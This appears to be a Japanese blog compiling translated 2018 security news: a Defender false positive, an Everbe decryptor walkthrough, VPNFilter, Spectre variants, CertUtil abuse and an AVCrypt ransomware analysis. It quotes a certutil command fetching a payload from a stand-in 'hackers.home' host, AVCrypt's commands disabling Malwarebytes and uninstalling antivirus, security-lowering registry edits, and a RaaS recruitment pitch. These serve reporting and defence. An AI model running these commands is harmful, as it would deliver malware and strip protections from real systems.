 MicrosoftのWindows Defender Security Intelligenceサイトのページによると 、Trojan:Win32/Bluteal.B!rfnの検出は、2018年5月18日頃に追加されたようである。これはヒューリスティック定義のようであるが、その説明は、「この脅威は、あなたのPC上で悪意あるハッカーの選択した幾つかのアクションを実行する」という漠然としたものである。他のプログラム のレポート (5月末からWindows DLL がBluTealとして検出される)を発見した。例えば、2日前から、あるReddit(【訳註】 アメリカ最大級のソーシャルニュースサイト、掲示板(ニコニコ大百科より))スレッド では、様々なユーザが多くのWindows 10 1803上で同じ挙動を報告していることが示されている。
画像をクリックすると拡大します
 Blutealとして検出されるプログラムやファイルの簡単なリストは以下を含んでいる。
C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#
Microsoftは、これが誤検出であることを認めている 
 この件に関してMicrosoftに接触した後、私は、この検出が誤検出であること、この問題は既に解決していると告げられたが、どの定義ファイルがアップデートされたのか、いつ解決されたのかについては告げられていない。定義ファイルのバージョン 1.271.37.0  によると、この定義は、昨日(6月26日、このアップデートがリストされているので)解決されたようである。
Everbe身代金要求型マルウェア用の復号ツールがリリースされた  BleepingComputer : News>Security (2018/06/14) Michael Gillespie とMaxime Meignan によってリリースされた。このツールは、犠牲者が彼らのファイルを無料で取り戻すことを可能にするものである。この身代金要求型マルウェアは、現在どのようにして拡散しているのか分かっていないが、犠牲者は、暗号化されたファイルの暗号化されていないバージョンを持っている限り、復号キーをブルートフォースで見つけるためにそれらを使用することができる。
Everbe身代金要求型マルウェアによって暗号化されたファイル
 暗号化されたファイルのある各フォルダに、この身代金要求型マルウェアは、!=How_recovery_files=!.txtと名付けられた脅迫文を作成する。これは支払い情報に関して everbe@airmail.cc にメールするよう犠牲者に指示している。
Everbe身代金要求型マルウェアの脅迫文
 Everbe身代金要求型マルウェアに感染し、暗号化されたファイルを持っている人々は、以下のガイドを使用して、無料でファイルを復号することができる。あなたがファイルの復号に支援を必要とするのであれば、遠慮無くEverbe Ransomware Help Topic で質問しなさい。
Everbe身代金要求型マルウェアの復号方法 
 Everbe身代金要求型マルウェアの犠牲者は、暗号化され、.everbe, .pain, もしくは .embrace拡張子にリネームされているたファイルを持っていることで特定することができる。Everbe身代金要求型マルウェアによって暗号化されたファイルを復号するには、先ず、以下のInsaneCrypt Decryptorをダウンロードする必要がある。このツールは、Everbeもサポートしている。
InsaneCrypt Decryptorのダウンロード(直リンク) 
 ダウンロードしたら、この復号ツールを起動するために実行ファイルをダブルクリックする。あなたはメインスクリーンを表示されるだろう。
復号ツールのメインスクリーン
 復号キーをブルートフォースで見つけるために、我々は、暗号化されたファイルとオリジナルの暗号化されていないファイルの両方を必要とする。この二つを持っているなら、SettingメニューをクリックしBruteforcerを選択しなさい。これは、以下に示したように、暗号化されたファイルと暗号化されていないバージョンの両方を選択するように要求してくる。
ブルートフォース用のファイル選択画面
 両方のファイルを選択したら、ブルートフォースで復号キーを見つけるためにStartボタンをクリックする。このプロセスは、かなり時間がかかるので、辛抱強く待ちなさい。
ブルートフォース中の画面
 終了すると、この復号ツールは、復号キーが発見されたと伝えてくるので、右上の X ボタンを押してBruteForcerウィンドウを閉じる。そこで、以下に示したように、復号キーが、この復号ツール中にロードされる。
ロードされた復号キー
 我々は今、復号するディレクトリを選択する必要がある。あなたがドライブ全体を復号したいのであれば、ドライブレター自体を選択しなさい。例えば、以下の画像で、あなたは、C:\ ドライブが選択されているのを確認できる。
ドライブが選択されている
 準備ができたら、Everbeで暗号化されたファイルの復号を開始するために、Decryptボタンをクリックする。Decryptボタンをクリックすると、このプログラムは暗号化されている全てのファイルを復号し、そのウィンドウ中に復号状況を表示する。
ファイルの復号中
 終了したら、この復号ツールは復号されたファイルの総数を表示する。ファイルの一部がスキップされているのであれば、そのファイルのパーミッションに起因しているかもしれない。
復号終了
 これで、あなたのファイルは復号されたが、暗号化されたファイルそのものは、依然としてコンピュータ上に存在している。あなたのファイルが適切に復号されていることを確認したら、暗号化されたファイル全てを一つのフォルダに移動させるためにCryptoSearch を使用しなさい。そこで、あなたは、それらを削除したりアーカイブしたりすることができる。Everbe Ransomware Help Topic  で質問しなさい。
脅迫文 
Hi !
VPNFilterは、ASUS, D-Link, Huawei, Ubiquiti, UPVEL, ZTEにも感染することができる  BleepingComputer : News>Security (2018/06/06) 
新たなVPNFilterプラグイン 
 更に、研究者は、このマルウェアの三段階開発システムの一部としての第三段階のプラグインとしてパックされた新たなVPNFilterの能力を発見した。
VPNFilter構造
 Ciscoの専門家は、彼らが以下の二つの新しい第三段階プラグインを発見したと発言した。
 ssler  - 中間者攻撃を介してポート80のWebトラフィックをインターセプトし改竄するためのプラグイン。このプラグインはHTTPSをHTTPにダウングレードすることをサポートしている。dstr  - デバイスのファームウェア・ファイルを上書きするプラグイン。Ciscoが既知のVPNFilterは、デバイスのファームウェアを削除することができた。彼らの最近のレポートでは、この具体的な第三段階プラグインに対する機能を指摘している。
 これら二つの新しいプラグインは二つの既知のものに追加されている。
 ps  - ネットワークパケットを盗聴し、特定の種類のネットワークトラフィックを検出するプラグイン。Ciscoはこのプラグインが、しばしば、工業用ソフトウェアやSCADA機器によって使用されるModbus TCP/IPパケットを探すために使用されていると確信しているが、大多数の最近のレポートでは、このプラグインが、TP-Link R600仮想プライベートネットワークに接続されている工業用機器も探していると主張している。tor  - Torネットワークを介してコマンド&コントロールサーバと通信するためにVPNFilterボットによって使用されるプラグイン。
 一般的な、VPNFilterマルウェアに関する技術的詳細は、Ciscoの最初のレポート に存在している。ssler, dstr, ps第三段階プラグインに関する詳細は、本日公開されたレポート に存在している。VPNFilterボットネット は、世界中のデバイスに感染したことで発見されたが、研究者は、このボットネットが、ウクライナのITインフラストラクチャへのサイバー攻撃を準備している時に、その発見を公開した。このサイバー攻撃は、5月末ウクライナのキエフで行われるUEFAチャンピオンリーグサッカーの決勝の日に起こると、多くの人は信じている。無力化するためにFBIが 介入した。それにも拘わらず、ロシア軍の一部隊と信じられているこのマルウェアの背後にいるグループは、ウクライナのネットワーク上の感染したデバイスへの注視を継続するために、最近新しいボットネットをアッセンブル することを始めた。この記事 において示されている。感染したデバイスからVPNFilterを削除することは、このマルウェアが、SOHOルータとIoTデバイスに関してブート・パーシステンスを達成することのできる二つのマルウェア株の一つなので、相当困難なことである。更に、ルータがこのマルウェアに感染した目に見える兆候は、あなたがルータのファームウェアをスキャンした場合を除いて存在しないし、あなたが感染を認識した場合でさえ困難である。我々が現時点で与えることのできる最良のアドバイスは、間違いなくアップデートしたファームウェアでルータを稼働することである。
Asus: 
D-Link: 
Huawei: 
Linksys: 
Mikrotik: (バグはRouterOSバージョン6.38.5で修正された)
Netgear: 
QNAP: 
TP-Link: 
Ubiquiti: 
UPVEL: 
ZTE: 
 
ハッカーは、WordPressサイトにバックドア化されたプラグインをインストールする新しい方法を発見している  BleepingComputer : News>Security (2018/05/23) レポート と、サイバー犯罪者によってハイジャックされたサイトオーナーからの公式のWordPress.orgフォーラムへの幾つかの投稿 によると、攻撃は5月16日から発生している。
攻撃の動作方法 
 この攻撃の最初のステップは、ハッカーが公に晒されたユーザ名とパスワードを取得し、WordPress.comアカウントへのログインを企てることで構成される。
ハッカーはJetpackを介してバックドア化されたプラグインをインストールする 
 このJetpac と名付けられた解析モジュールは、多くの新しい機能で成長し、今や、WordPressサイトにおいて最も人気のあるプラグインの一つである。
 Wordfenceによると、WordPress.comアカウントを乗っ取り、リンクされたセルフホスト型WordPressサイトを発見したハッカーは、これまで安全であったサイトにバックドア化されたプラグインを配備するために、このリモート管理機能を乱用している。
ハッキングは一週間発生している 
 エキスパートは、攻撃者が、"pluginsamonsters"(その後の5月21日に"wpsmilepack"と別の名前に変更された)と名付けられたプラグインを配備することを5月16日に開始したと発言している。
GoogleとMicrosoftは、新たなSpectre攻撃を公開した  BleepingComputer : News>Security (2018/05/21) AMD , ARM , IBM , Intel , Microsoft , Red Hat , Ubuntu は、記述の時点でセキュリティ・アドバイザリを公開している(緩和策と共に、このバグの動作方法の説明を含む)。
StectreNGとして知られているバグ 
 過去数週間SpectreNGと呼ばれてきたこのバグは、昨年発見され2018年の初めにアナウンスされた、以前のMeltdownとSpectreのバグに関連している。
Variant 1: 境界チェックのバイパス(CVE-2017-5753)。別名、Spectre v1Variant 3a: 不正なシステムレジスタの読み込み(CVE-2018-3640) Variant 4: 投機的ストアバイパス(CVE-2018-3639) 
 Variant 3aは、Meltdownフローの亜種であるが、Variant 4は、新たなSpectre様の攻撃である。これら二つの内で重要なものは、Variant 4である。この二つのバグは同じ理由、即ち、投機的実行 (全ての最先端のCPU中に見出される機能で、条件分岐の先を予め実行し、後で不必要なデータを廃棄することによってパフォーマンスを改善する役割も持っている)で発生する。説明ビデオをYouTubeで公開 している。
 ...特権化されたコード中に正確に定義された命令シーケンスの存在に依存している、並びに、メモリは、最新のメモリ書き込みが起こったアドレスから読み込むという事実は、古い値を閲覧し、続いて、投機的実行が実際には委任していない命令でさえ、アップデートをマイクロプロセッサのデータキャッシュに発生させるかもしれない。
 「この脆弱性の悪用に成功した攻撃者は、信頼境界線を越えて特権化されたデータを読み込むことが可能になる」と、Microsoftは類似のアドバイザリで発言し、このフローがSandbox化された環境から抜け出すために使用することができるとするRed Hatのアセスメントを確認している。Microsoftはまた、Variant 4バグに関する詳細なブログ(6:23 AM - May 22, 2018のツイート) を公開している。proof-of-concept(概念の実証) コードを公開している。
追加のパッチがリリースされている 
 Leslie Culbertson(Intelの執行副社長兼製品保証&セキュリティ本部長)は、2018年1月からのオリジナルのMeltdownとSpectreのパッチは、同様にVariant 4を緩和するのに十分なものであると発言している。Culbertsonは発言 している。ホワイトペーパー において、Variant 4緩和策を無効にしたままにすることを推奨している。発言 している。
Windows 10の4月のアップデートのロールアウトが、Intelと東芝のSSD搭載デバイスに関して停止された  BleepingComputer : News>Security (2018/05/16) 
Intel SSD 600p Series
 Intelと東芝の問題は別々であるかのようである。より具体的には、Intel SSDを使用しているWindows PCは、頻繁にクラッシュし、再起動した後、UEFI(【訳註】 Unified Extensible Firmware Interface、BIOSに代わる仕様)画面になる。他方、東芝SSDのユーザは、バッテリの短命化やSSDドライブが非常に熱くなると報告している。1 , 2 )において、Microsoftは、影響を受ける可能性のある全てのデバイスを特定し、2018年4月のアップデートをインストールさせないようにするために、OEMプロバイダ、Intel、東芝と共同で作業していると発言している。
PDFが、あなたのPCをグチャグチャにする方法はどれだけあるのだろうか? 今回のAdobe アップデートだけで47  The Register : Security (2018/05/14) リリース した後、一週間以内に出現している。このアップデートはまた、Mac、Windows両方のCreative Cloud用アップデートを含んでいる。
テキスト爆弾と"black dot of death"(「死の黒丸」)がWhatsAppとiMessageユーザを悩ませている  Bitdefender : Hot for Security (2018/05/12) 
 このメッセージ(引用符で囲まれ、laugh-until-you-cry(泣くまで笑う)絵文字が続いている文章)は、一見して無害なように見える。しかし、この絵文字と後ろの引用符との間には、表示されないように隠された数千の文字が、コッソリと隠されている。アドバイス している。簡単に、あなたのスマホは破壊されてはいない。この類似の"killer text bomb"脆弱性を修正 した。chaiOS bug "として知られる類似の「テキスト爆弾」が、1月にユーザのMac、iPhone、iPadを汚損したという事実は、Appleにとって、この問題が現在進行形の問題であることを示している。
伝えられるところによるとオンライン上に不可思議なIEの0-Day、"Double Kill"  Sophos : NakedSecurity (2018/04/25) 主張していること は、オンラインで積極的に悪用されているInternet Explorerの0-Dayの脆弱性である。
 攻撃を実行するためにブラウザの0-Day脆弱性を使用した最初のOffice Documentベースの脆弱性攻撃である。悪意あるOfficeドキュメントを開くと、犠牲者のコンピュータの制御を完全に奪うことのできるトロイの木馬の感染を引き起こすだろう。(中略)。ハッカーは、悪意あるWebページを含むOfficeドキュメントを配布することによって、APT攻撃(【訳註】 Advanced Persistent Threat、特定のターゲットに対して持続的に攻撃・潜伏を行い、様々な手法を駆使して執拗なスパイ行為や妨害行為などを行うタイプの攻撃の総称(IT用語辞典より))を実行する。影響を受けたユーザが、このドキュメントを開くと、この脆弱性を使用して悪意あるスクリプトとペイロードが、リモートホストからダウンロードされ実行される。
 我々が未だ知らないことが以下である。
・ ドキュメントのどのファイルフォーマット(例、RTF, DOC, DOCX, XLS, XLSX, PPT, PPTX)が、この脆弱性の引き金として使用されるのか。 
 Qihooのダイアグラムは、ドキュメントがシェルコードを含んでいることを示しているが、Internet Explorerは、このダイアグラム中に全く描かれていない。
 攻撃の後段で、この脆弱性攻撃は、ファイルが検出されることを回避するために、公になっているUACバイパステクニック、ファイルステガノグラフィ(実行可能コンテンツを画像ファイルの内部に隠す)、Reflective DLL Injection(メモリ中に直接プログラムをポーキングする)を使用している
何をすべきか? 
 現時点で、我々は実際の攻撃に使用された如何なるサンプルファイルも持っていない。我々は、ブービートラップされたドキュメントが、警戒することのできる何らかの兆候を持っているのか否か分かっていない。我々は、Internet Explorerが攻撃にどのように参加するのか分かっていない。そして、我々は、Officeが、"Double Kill"の引き金に使用される唯一のアプリケーションであるか否か分かっていない。
WebEXに緊急の脆弱性  The Register : Security (2018/04/19) アドバイス している。CVE-2018-0238 )を発見した場所である。
CertUtil.exeは、アンチウィルスをバイパスしながらマルウェアをダウンロードすることを攻撃者に可能にしていた  BleepingComputer : News>Security (2018/04/04) Casey Smith は、2017年に、この方法はマルウェアをダウンロードするために使用することができるだろうとする彼の懸念をツイート している。サンプル は、2016年にCertUtilを悪用した、そして、2018年3月の最近のトロイ もまた、感染させたコンピュータに様々なバッチファイルやスクリプトをダウンロードするためにCertUtilを悪用している。
最近のトロイで使用されているCertUtil(画像をクリックすると拡大します)
 攻撃者が既にコンピュータに足がかりを持っているにも拘わらず、CertUtilを使用することを、あなたは不思議に思うだろうか? これは、一部のコンピュータがLockdown(【訳註】 セキュリティ強化のために、OSやアプリケーションなどの機能やリソースを制限すること)されている可能性があり、そのため未知のアプリケーションがプログラムをダウンロードすることができないためである。組み込みのWindowsプログラムを使用することにより、CertUtilは、インストールされているセキュリティプログラムによってホワイトリストに登録されるので、ファイルをダウンロードすることが可能になる。Windows regsvr32.exe が類似の方法で使用されている程ではない。
セキュリティソフトをバイパスするためにCertUtil+Base64を使用する 
 本日、セキュリティコンサルタントでありISCハンドラーでもあるXavier Mertens は、ハンドラダイアリ を公開した。これには、CertUtilの使用に新機軸を追加している。この新機軸は、攻撃者のダウンロードが、エッジ・セキュリティ・デバイスによって未検出のままにすることをより簡単にする可能性のあるものである。この新機軸は、最初に悪意あるファイルをBase64エンコードすることで、この悪意あるファイルを無害なテキストのように見せかけ、次に、CertUtil.exeを使用して、このファイルをダウンロードさせた後、それをデコードするものである。
certutil.exe -urlcache -split -f [URL] output.file
 このコマンドは、ファイルをそのオリジナルの形式でダウンロードし、それをそのコンピュータに保存する。この方法の問題は、ネットワーク・セキュリティ・デバイスが、そのファイルを悪意あるものとして検出し、ブロックすることにある。
C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
 この方法は、エッジ・デバイスの検出をかい潜る可能性がある。そして、安全ではないかもしれないローカルマシン上で実行ファイルに変換される。MalwareHunterTeam は、certutil.exe -decode の使用は、既に使用されていると、私に告げている。その例は、これらのサンプル 中で確認できる。更に、公開後、我々はまたF5 Labのこの記事 を発見した。そこでは、WindowsにコインマイナーをインストールするためにCertUtil.exeを使用するキャンペーンを詳細に説明しているFabio Assolini は、この方法は、暫くの間ブラジル人のプログラマによって使用されてきたものであると、我々に警告した。
IntelのMeltdown脆弱性に関するMicrosoftの三回目のパッチもまた、パッチが必要かもしれない  The Register : Security (2018/04/03) WSUS (Windows Server Update Services)では、このコンピュータ用には”Not Applicable”と表示される)と発言している。偶然導入された緊急の脆弱性 を解決するためのパッチ(3月初めにリリースされた)を補完するために、先週Microsoftによってリリースされた。Meitdown パッチで導入されたセキュリティ・バグCVE-2018-1038を全滅させることを企てたが、完全に効果があったというわけではなかったので、KB4100480を入手しインストールすることが必要になった。
役に立たない 
 我々は、この問題に関してMicrosoftに尋ねた。その応答として、偽りなくMicrosoftの形式で、役に立たない以下の声明を受け取った。「このアップデートは、WSUSの顧客に利用可能なものである。その顧客は、そのカタログからWSUSに、それをダウンロードしインポートすることができる。」スレッド は、この件に関することが突然発生している。彼らは、本当に彼らのマシンがパッチのパッチのパッチを必要としているが、WSUSにそれを適用させることができないと、多くの人が発言している。
Microsoft: Windows 7とServer 2008に対するMeltdownパッチの修正パッチを公開  The Register : Security (2018/03/29) Meltdownチップレベル脆弱性 を解消するためにWindows 7とServer 2008 R2用のパッチを発行した。残念なことに、これらのパッチは、これらのオペレーティングシステムにセキュリティ上の重大な欠陥を開けた 。通常のアプリケーションとログイン・ユーザは、このアップデートをインストールすることで、現在、物理RAMの一部にアクセスし改竄することができ、それらOSの完全な制御を取得できる。
Total Meltdown 
 現在、あなたがWindows 7もしくはServer 2008 R2を使用し、MicrosoftのMeltdownパッチを適用しているのであれば、本日のCVE-2018-1038用の緊急のアップデート を入手しインストールしたほうがいい。公開した 。結局の所、今月のアップデートは、この脆弱性を完全に修正しなかった。そして、Microsoftは、Windows 7やServer 2008中の0-Dayの脆弱性を改善するために緊急発進しなければならなかった。
The RegisterのTwitter
 追伸、我々の中にはメモリ管理ユニットのページテーブルを操作するカーネルモードのコードを書いた者もいる。それは大変厄介で苛つくものである。Microsoftよくやった。最後に上手くいったね。
 Friskは、彼が昨日まで、依然としてOSレベルのバグがあることを知っていただけだと、The Registerに告げた。彼が、今週初め、彼がこのフローは生きていたとブログしたのは、3月のアップデートが全てを解決したという確信に基づき、Microsoftセキュリティグループを祝福したものである。
MeltdownとSpectreの後、Intel CPUは今、BranchScope攻撃に対する脆弱性がある  Softpedia : News > Security (2018/03/28) 彼らの論文によると 、それらがもう少し精緻であったとしても、このBranchScope攻撃は、攻撃者が、セキュリティ脆弱性を悪用し、共有されている方向性分岐予測(【訳註】 プログラム実行の流れの中で条件分岐命令が分岐するかしないかを予測することにより、命令パイプラインの効果を可能な限り維持し、性能を高めるためのCPU内の機能(Wikipediaより))を巧みに操ることによって重要なデータ(パスワードと暗号化キーを含む)を未パッチのシステムから取得できるという点で、MeltdownやSpectreフローと同じダメージを実行することができる。
Sandy Bridge, Haswell, Skylakeも影響を受ける 
 この研究者達は、最近の3つのIntel Core i5、Core i7、x86_64(64-bit)プロセッサ・ファミリー(Sandy Bridge, Haswell, Skylakeを含む)で、BranchScope攻撃をデモしている。これらの攻撃の最悪の部分は、BranchScopeが拡張され、攻撃者がIntel SGX(Software Guard Extensions)エンクロージャ内で実行されているアプリケーションを対象とする、より高度で柔軟な攻撃を実行するための追加ツールを提供できることにある。
アップデート : Intelのスポークスマンは、以下の声明を我々に提供した。
 「我々は、これらの研究者と共に作業中である。そして、彼らが説明している方法は、既知のサイドチャンネル悪用に類似している。我々は、既知のサイドチャンネル悪用のための既存のソフトウェア緩和策(サイドチャンネル耐性暗号の使用のような)が、この論文で説明されている方法に対して効果的であると予測している。我々は、研究コミュニティとの緊密なパートナーシップが、顧客とそのデータを保護する最良の方法の一つであると確信しており、これらの研究者の協力に感謝している。」
AVCrypt身代金要求型マルウェアはアンチウィルスソフトをアンインストールしようとする  BleepingComputer : News>Security (2018/03/23) MalwareHunterTeam (筆者Lawrence AbramsとMichael Gillespie)の解析で、ファイル名が単純なav2018.exeであったので、この身代金要求型マルウェアはAVCryptと名付けられた。だが、このマルウェアの開発者は、この身代金要求型マルウェアのサンプル中に発見された幾つかのデバッグメッセージに基づきLOLと名付けている可能性がある。
デバッグメッセージ
 名前が何であれ、この感染は、我々が今まで確認していない方法でソフトウェアをアンインストールすることを企てる。これらの機能は、以下のセクションで概説する。
AVCcryptはセキュリティソフトをアンインストールしようとする。 
 既に述べたように、AvCryptが起動すると、インストールされているセキュリティソフトを犠牲者のコンピュータから削除しようとする。このマルウェアは、これを二つの方法で実行する。(1)特にWindows DefenderとMalwarebytesをターゲットにすることによって、(2)インストールされているアンチウィルスソフトを検索することによって、次に、それらを削除しようとする。
cmd.exe /C sc config "MBAMService" start= disabled & sc stop "MBAMService" & sc delete "MBAMService";
 次に、どのアンチウィルスソフトがWindows Security Centerに登録されているかを調べ、WMICを介して、そのアンチウィルスを削除しようとする。
cmd.exe /C wmic product where ( Vendor like "%Emsisoft%" ) call uninstall /nointeractive & shutdown /a & shutdown /a & shutdown /a;
 だが、上述のコマンドでは、Emsisoftをアンインストールすることはできない。このコマンドが、他のアンチウィルスソフトで動作するか否かは分かっていない。
ワイパーか、開発中に身代金要求型マルウェアなのか? 
 この時点で、AVCryptは、何方の分類にも結びつく特徴があることから、開発段階の身代金要求型マルウェアなのか、ワイパーなのか明らかではない。
MBAMService
 これらのサービスが削除された後も、Windowsは機能を継続するが、おそらく、Windowsの適切なオペレーションに問題が発生するだろう。
 同時に、この感染は、リモートのTORサイトに暗号化キーをアップロードする、そして、この脅迫文の内容は単なるプレースホルダであるかもしれない。更に、この身代金要求型マルウェアが実行されると、それが起動する前に警告を表示する。そこには多くのデバッグメッセージがあるので、開発段階の身代金要求型マルウェアである可能性が十分ある。
既に攻撃が始まっているのか、それとも単なる偶然なのか? 
 私はこの身代金要求型マルウェアが開発段階のものとする見解に傾いているが、セキュリティ研究者がTwitterに投稿 したところによると、日本の大学(【訳註】 中部大学)のコンピュータが、アンチウィルスソフトをアンインストールする身代金要求型マルウェアに最近感染している。
AVCrypt暗号化プロセス 
 AVCryptが実行されると、短い間アイドリング状態になり、埋め込まれているTORクライアントを抽出し、暗号化キー、タイムゾーン、犠牲者のWindowsバージョンを送信するbxp44w3qwwrmuupc.onionコマンド&コントロール サーバーに接続する。そのキーの一部としてメモリーから他のコンテンツを追加しているので、この送信中にはエラーが存在しているようである。
暗号化されたファイル
 ファイルが暗号化された各フォルダには、+HOW_TO_UNLOCK.txtと名付けられた脅迫文が作成される。この脅迫文には、以下に示すように、如何なる接触情報も指示も含まれていない。
AVCryptの脅迫文
 このマルウェアが実行されている間、そのコンピュータのセキュリティを減少させるために様々なレジストリ値を追加したり削除したりもする。
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes     .cmd;.exe;.bat;
 値が変更されるものの一部には、以下が含まれる。
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden     "0"     (old value="1")
 実行されると、このマルウェアは、+.batと名付けられたバッチファイルを実行する。これはドロップされたあらゆるファイルをクリーンアップし、イベントログをクリアし、この身代金要求型マルウェアのプロセスを終了し、そして、このオートランエントリを削除する。
バッチファイルの内容
 見てきたように、この身代金要求型マルウェアは感染したコンピュータを完全に破壊すると共に、同時に暗号化キーをリモートサーバにアップロードしているかのようである。それ故、これが本当に身代金要求型マルウェアなのか、身代金要求型マルウェアを装っているワイパーなのか定かでない。
IOC 
ハッシュ 
a64dd2f21a42713131f555bea9d0a76918342d696ef6731608a9dbc57b79b32f
ネットワーク接続 
bxp44w3qwwrmuupc.onion
関連ファイル 
+HOW_TO_UNLOCK.txt
脅迫文 
lol n
Windowsリモートアシスタンス・ツールは標的型攻撃に使用される  BleepingComputer : News>Security (2018/03/20) CVE-2018-0878 として追跡されるこの問題のパッチは、先週リリースされた2018年03月のMicrosoftの定例パッチ に含まれていた。
データ抽出に理想的な脆弱性 
 この脆弱性は、犠牲者の認識なしにコンピュータからあらゆるファイルを抽出し、それをリモートサーバにアップロードすることを可能にするものである。
このハックの動作方法 
 この脆弱性もしくはハックの動作方法を理解するには、ユーザは最初にWindowsリモートアシスタンス・ツールの動作方法を理解する必要がある。発見した 。
標的型攻撃に役立つハック 
 攻撃者は、標的のPC上に存在することが知られている機密情報(ログ、バックアップ、データベースファイル、INI、その他パスワードや他の設定オプションを含む設定ファイル)を含むファイルを獲得するために、この脆弱性を利用することができる。クイックアシスト(Quick Assist) に置き換えている。Quick Assistは、Invitation Fileの代わりにInvite Codeを使用しているので、この種の攻撃に対する脆弱性は存在していない。
身代金を支払った人々の半分しかデータは復元されていない  BleepingComputer : News>Security (2018/03/09) 
全犠牲者の1/4を越える人々が永遠にデータを失っている 
 この調査は、全回答者の55%が2017年中に身代金要求型マルウェアに感染していることを明らかにしている(前年の研究結果と比較すると、類似の感染者は61%)。CyberEdgeの調査 の他の発見は以下である。
・ 全組織の77%が、2017年にサイバー攻撃で傷つけられている(2016年は79%以下)。 
InternetのEmailサーバーの半分に影響を与える脆弱性  BleepingComputer : News>Security (2018/03/06) Exim ソフトウェア(メール転送エージェント(MTA))中の脆弱性である。インターネットEmailサーバー全体の56% (その時点で56万を超える)がEximを実行していた。より最近の別のレポート は数百万に上るとしている。
このバグはリモートコード実行を可能にする 
 Meh Changと名乗る台湾のセキュリティ研究者が、このバグを発見した、そして、彼は2月2日に、この問題をEximのクルーに報告した。Eximチームは、このRCE(【訳註】 リモートコード実行)問題を修正するEximディストリビューション 4.90.1を2月10日にリリースした。ブログへの投稿 で、このバグを説明(EximのSMTPデーモンを悪用するための基本ステップを詳らかにするために)した。
Proof of Concept(概念の実証)や悪用コードは存在していない 
 セキュリティ・アドバイザリ において、Eximチームは公にこの問題を認めた。「現在、我々は重大性に関しては不確かである。我々は、悪用は困難であると確信している。緩和策は知られていない」と、Eximチームは発言している。二つの他のEximバグ を発見している。これもまた、リモートコード実行を導く。これらのバグは、Exim 4.90でパッチされている。
新しいSaturn RaaSは、無料であらゆる人を身代金要求型マルウェアの配布者にする  BleepingComputer : News>Security (2018/02/18) 
系列は身代金の70%を得る 
 そのようなファイルの一つ(Saturn RaaSインターフェースにおいてはスタブと呼ばれる)を生成するユーザは、次に、EXE、Office, PDF, 他のドキュメントのような他のファイルに、それを埋め込まなければならない。これらのファイルは、次に、最も一般的な二つの身代金要求型マルウェア拡散方法であるスパムメールや悪意ある広告キャンペーンの一部としてユーザに送信される。
 サインアップした後、あなたのアカウントにログインし、新しいウィルスを作成し、それをダウンロードする。これで、あなたは、作成したこのウィルスで人々への感染を開始する準備ができた。ここで、重要なことは、70%のBitcoinが、あなたの口座に入る。例えば、あなたが身代金を $300 とした場合、あなたは $210 を得、我々は $90 を得る。
 Saturnの7:3の分け前は、Cerber RaaS(今日、最大の身代金要求型マルウェア オペレーションの一つ)の分け前と同じようなものである。
Saturn RaaSダッシュボード(画像をクリックすると拡大します)
Saturn RaaSチャット(画像をクリックすると拡大します)
Saturn RaaSスタブ ビルダー(画像をクリックすると拡大します)
Saturn RaaS払い戻し(画像をクリックすると拡大します)
 Bleeping Computerは、先週の金曜日、我々の読者が、ここで閲覧できる記事で、Saturn身代金要求型マルウェアを解析した。この身代金要求型マルウェアは、積極的な拡散活動中である。
b3040fe60ac44083ef54e0c5414135dcec3d8282f7e1662e03d24cc18e258a9c
GandCrabもまた、RaaSを介して提供されていた 
 激しい配布活動が見られるもう一つの身代金要求型マルウェアは、GandCrab身代金要求型マルウェア である。この株もまた、RaaSに似た悪巧みで提供されている。ブログはこちら )。
Googleが、Microsoft Edgeのセキュリティ機能のバイパスを公開  BleepingComputer : News>Security (2018/02/17) 
 Googleは、攻撃者がMicrosoft Edgeブラウザのセキュリティ機能の一つ(Arbitrary Code Guard(ACG))を悪用し、バイパスすることのできるEdgeの脆弱性に関する詳細を公開した。ブログ で、この二つのセキュリティ機能を説明している。ACGとCode Integrity Guard(CIG)の概要は以下である。
 アプリケーションは次のどちらかによってメモリに悪意あるネイティブ コードを直接読み込むことができます。
GoogleのエンジニアはACGをバイパスする方法を発見した 
 GoogleのProject Zeroチームのセキュリティ エンジニアIvan Fratricは、ACGをバイパスし、攻撃者がメモリ中に未署名のコードをロードすることを可能にする方法を発見した。これは、攻撃者がEdgeにロードされた悪意あるWebサイトを介してWindowsに入り込むことを可能にするものである。
Fratricが発見した二回目のEdgeのバグ 
 この問題に関する詳細が今や公開された 。これは、FratricがEdgeのバグを公開した最初の事例ではない(昨年2月 にも、公開している)。Domato (ブラウザエンジン中のセキュリティ上の欠陥を発見するためのファジング・ツール(【訳註】 ソフトウェアの不具合(とくに脆弱性を意図することが多い)を発見するためのテスト・ツール(Wikipediaより))の作者でもある。
Lenovoは、多くのThinkpadモデルに影響を与える緊急のWiFi脆弱性を警告  Kaspersky : ThreatPost (2018/02/09) 9月に 明らかにされ、当初それらは、Apple iPhones, Apple TV, Androidデバイス中に使用されている特定のチップセットに影響を与えるだけだと報道されていた。Lenovoアドバイザリ によると、このWiFiチップセットは、AppleとGoogleによって9月にパッチされた同じファームウェアの脆弱性(CVE-2017-11120 とCVE-2017-11121 )を含んでいる。バグレポート として公に公開された。Android Security Bulletin でこのバグをパッチしている。研究者によると 「適切に細工された悪意ある無線Fast Transitionフレームは、潜在的に内部WiFiファームウェアのヒープやスタックオーバーフローを引き起こし、DoSやその他の影響を引き起こす可能性がある。」GoogleのAndroid OS と連動してApple iOSやtvOS にも影響を与える。
WordPressユーザへ: 今アップデートを手動で実行しなさい  Sophos : NakedSecurity (2018/02/08) バージョン4.9.3 Maintenance Release を送り出した。34のバグフィックス が存在していた。そして、誰かが、即座にバグフィックスすることを望んでいただろうか?WordPress 3.7が出現した 2013年10月に遡り、Naked SecurityのMark Stockleyの記述がある。
 我々は、デスクトップ、タブレット、ラップトップ、スマートフォンで、バックグラウンドでそれ自体を暗黙のうちにパッチするこのソフトウェアの考えに完全に慣れた。そして、だいぶ遅れたとはいえ、この人気あるWebソフトウェアが追いつくのを見ることは良いことである。
 今日、幾つかの見積は、WordPress Webサイトはもっと多く共有されている(20%を超える)としているので、自動アップデートは2013年当時よりずっと重要になっている。
22のバグの落とし穴 
 残念ながら、WordPress 4.9.3は、アップデート・バグを導いた。4.9.3に自動アップデートした後、WordPressはもはや自動アップデートをしない。既に4.9.4が出現している ことである(翌日に緊急の修正として公開された)。
何をすべきか 
 WordPressはバグの説明と「手動」でのアップデートに関する詳細な説明 を公開している。長過ぎて、全部読まなかったが、
